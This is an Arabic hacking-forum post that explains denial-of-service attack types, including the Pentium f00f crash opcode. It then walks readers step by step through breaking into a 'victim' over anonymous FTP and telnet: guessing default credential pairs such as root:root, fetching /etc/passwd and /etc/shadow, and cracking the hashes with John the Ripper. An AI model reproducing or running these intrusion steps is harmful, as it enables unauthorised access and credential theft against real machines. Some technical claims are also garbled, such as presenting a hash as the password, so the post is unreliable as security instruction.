      يعتمد هذا الهجوم على استغلال نقاط الضعف في بروتوكول (TCP/IP) المصمم للعمل أساساً في بيئة آمنة مفتوحة، مما جعله يحوي العديد من الثغرات التي يمكن أن يستخدمها المخترقين Crackers.

      من المفارقات في هذا الموضوع أن المخترقين المحترفين وحتى المخربين منهم يعتبرون هذا النوع من الهجوم أنه رديئ ويسخرون ممن يقومون به باعتباره أنه اسلوب المبتدئين، ولا يحتاج إلى معرفة وخبرة.
      يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار:
      1-استهلاك عرض الحزمة Baud rate consumption
      حيث يقوم المهاجم باستهلاك كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة من الطلبات مثل: GET, SYN... وغيرها، مما يؤدي إلى استهلاك كامل عرض الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون ذلك إما بالهجوم مباشرة Direct Attack حيث ينتصر في هذه الحالة من لديه عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط العديد من المواقع من أجل إغراق نظام الضحية حيث يقوم المهاجم باستخدام أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه الحالة من عرض حزمة تلك الشبكة.
      من الجدير بالذكر في هذا الصدد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من أنني لم أقم بعد بتحليله كاملاً بعد، إلا أنني أستطيع القول من التحليل المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام المستهدف وهو في هذه الحالة Web server مما يؤدي إلى زيادة الحمل على المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل منها على أنها Process مستقلة تقوم بارسال طلبات GET المذكورة، إن فعالية هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة، إلا أن القوة الحقيقية تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم الهجوم على هدف محدد في وقت معين بدقة، وهذا مايقوم به برنامج الدرة حيث أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة معرفته إلا أنني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه على أهداف الهجوم، ثم يقوم بالهجوم. (شكرا لـ Sp@nder على تزودي بنسخة من برنامج الدرة).

      2-استهلاك الموارد: هذا النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory, Kernel, File system ... وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم استقراره وانهياره في نهاية الأمر.

      3- الثغرات البرمجية أو في مكونات النظام:
      لا يوجد نظام أو برنامج خالي تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه الثغرات مثلا بارسال Packets غير متوفقة مع المعايير القياسية لـ بروتركول TCP/IP المحددة من قبل RFC إلى نظام الضحية مما يؤدي إلى نتائج تختلف حسب نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو فيضان المكدس stack وغير ذلك.
      والأسوأ من هذا استخدام الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة الآلة opcode التالية 0xf00fc7c8 على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً.
      لسوء الحظ لا يمكن الكشف عن هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسبب ما...... ؟؟؟؟؟!!!!!!! الله أعلم

      كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع.


      كنت أنوي أن أتحدث عن طرق الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات لمناقشته، إلا أن المهم بالنسبة للمستخدم المنزلي هو إخفاء رقم IP الخاص به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal ...وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى الشبكات والسيرفرات في موقع فلاشيات ;)


      مايتطسع فعله netstat
      NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
      NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
      NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
      NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
      NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
      NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
      NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة


      درس مهم لتعلم الاختراق بالtelnet
      nor2000.com/telnet.htm

      درس مهم لتعلم الاختراق بالnetbios
      nor2000.com/Logon.htm



      FTP
      أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
      21
      مفتوح و هو البورت الخاص بــ
      FTP
      و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
      Superscanne
      بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
      إضغط على
      Start
      ثم
      Run
      ثم اكتب
      ftp -n
      تطلع لك نافدة في الدوس مكتوب عليها
      FTP&g
      لحد هنا كل شيء تمام
      و بعدين اكتب
      Open
      ثم إضغط على
      إدخال
      Enter
      تتحصل عب النتيجة التالية
      FTP&g
      To
      أكتب جنب
      To
      رقم IP الضحية ثم إضغط على إدخال
      و الحين اهم جزء

      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      Connected to assassin.com/
      220 websrv1 Microsoft FTP Service (Version 4.0).
      و الآن أكتب الكتابة التالية
      ftp&gquote user ftp
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      331 Anonymous acces allowed, send identify (e-mail name) as password.
      و الآن أكتب الكتابة التالية
      ftp&gquote cwd ~root
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      530 Please login with USER and PASS
      ثم أكتب الكتابة التالية
      ftp&gquote pass ftp
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      و نجحت في الإقتحام يعني الاختراق

      230 Anonymous user logged in.
      مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
      ما عليك الآن الا ان تقوم بإستعمال
      اوامر الفتيبي
      و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
      قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

      Pwd
      لكي تعر ما يحتويه الهارد ديسك
      Cd
      لإقتحام مجلد مثال
      Cd black
      في هدا المثال قمت بإقتحام مجلد المسمى بلاك
      Ls
      لكي يتضح لك محتوى المجلد أو الهارد ديسك
      Get
      لكي تحمل الى سطح المكتب بتاع جهازك
      مثال
      Get black.exe
      Put
      العملية الع**ية ل
      Get
      يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
      في جهاز الضحية
      مثال
      Put black.exe
      Clos
      لقطع الإتصال مع الضحية


      هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
      Codes: Signification:
      110 Restart marker reply.
      120 Service ready in nnn minutes. (nnn est un temps)
      125 Data connection already open; transfer starting.
      150 File status oka about to open data connection.
      200 Command okay.
      202 Command not implemented, superfluous at this site.
      211 System status, or system help reply.
      212 Directory status.
      213 File status.
      214 Help message.
      215 NAME system type.
      220 Service ready for new user. 221 Service closing control connection.
      225 Data connection open; no transfer in progress.
      226 Closing data connection.
      227 Entering passive mode (h1, h2, h3, h4, p1, p2).
      230 User logged in, proceed.
      250 Requested file action okay, completed.
      257 "PATHNAME" created.
      331 User name okay, need password.
      332 Need account for login.
      350 Requested file action pendingfurther information.
      421 Service not available, closing control connection.
      425 Can't open data connection.
      426 Connection closed; transfer aborded.
      450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
      451 Requested action aborded: local error processing.
      452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
      500 Syntax error, command unrecognized.
      501 Syntax error in parameters or arguments.
      502 Command not implemented.
      503 Bad sequence of commands.
      504 Command not implemented for that parameter.
      530 Not logged in.
      532 Need account for storing files.
      550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
      551 Requested action aborded: page type unknown.
      552 Requested file action aborded.
      553 Requested action not taken. (Nom de fichier non attribué)


      Telnet
      ما هي التيل نت ؟
      التيل نت هي أداة قديمة في لينوكس(Linux) وينوكس(Unix) وأصبحت الآن موجودة في ويندوز .
      كيف يتم استخدامها سابقا ؟
      كانت تستخدم للتصفح بحيث ان مواقع الانترنت كانت مجرد نصوص بدون صور ... تخيل كم كانت الشبكة كئيبة ...
      كيف يتم استخدامها الآن ؟
      1 ــ قراءة بريدك الالكتروني بالطريقة التالية :
      اذهب إلى متصفحك واكتب telnet://hotmail.com:25/ وسوف يطلب اسم مستخدم وكلمة مرور(طبعا بعد ان يفتح التيل نت) ضع اسم بريدك وكلمة السر الخاصة بك واقرأ بريدك واتخدم الأمر Del msg#1 لحذف الرسالة الأولى وغير الرقم 1 برقم الرسالة المراد حذفها .

      2 ــ اختراق الأجهزة :
      ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف \ إضافة \ إزالة الملفات فيه ...
      تتم أيضا بنفس الطريقة من متصفحك اكتب telnet://ipnumberort/ حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
      21 - 25 - 32(الأساسي) - 99 - 2001
      والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال

      3 ــ اختراق المواقع :
      يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في موقع packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
      المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
      اسم المستخدم : كلمة المرور
      anonymous : anonymous
      guest : guest
      root : root
      sys : sys
      sys : sysadm
      sys : system
      games : games
      ftp : ftp
      mail : mail
      وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكس Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
      young
      test
      لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
      أي الحسابات الغير محمية بكلمة سر .
      اكتب الأمر :
      GET /etc/passwd و GET /etc/group و GET /etc/shadow
      ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
      data = download
      لكي تتمكن من التحكم بالملفات .


      ماهو الملف psswd ?
      الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
      ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد .
      هذا الملف في ثلاث حالات :
      1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
      2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
      3 ــ متروك مثل ما هو ..
      لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
      الباسووردات مشفرة ... سوف تراها كالمثال التالي :
      sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
      هنا سوف نعرف المعلومات التالية:
      1 ــ اسم المستخدم : sirhack .
      2 ــ كلمة السر : 89fGc%^7 .
      3 ــ الاسم الحقيقي : Sir Hackalot .
      4 ــ مجلد الحساب : usr/sirhack/
      5 ــ الغلاف(هنا الكلام في ينوكس او لينوكس) : bin/sh/
      كما رأيتم فكلمة السر مشفرة .

      ما هو الملف group ?
      هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .

      ما هو الملف shadow ?
      في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...

      كيف أفك التشفير ؟
      استخدم أحد برنامجين :
      1 ــ Cracker Jack .
      2 ــ John the ripper .
      وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكس(وينوكس) ...

      نسخة اللينوكس
      openwall.com/john/john-1.6.tar.gz

      نسخة الويندوز
      openwall.com/john/john-16w.zip

      إغلاق المنافذ port الموجودة بالجهاز


      ملا حظه الموضوع موجود في كتـات بكهـاك بس باللغة الإنجليزية ....
    • أحبتي ...

      لا شكر على واجب ولكن يجب أن يعلم الجميع بأن أي معلومه عن الإختراق أو التدمير تنصب تحت المعلومـات فقط
      راجياً من الله أن لا تستعمل ضد أخواننــا المسلمين

      تقبلوا تحياتي
      الأمير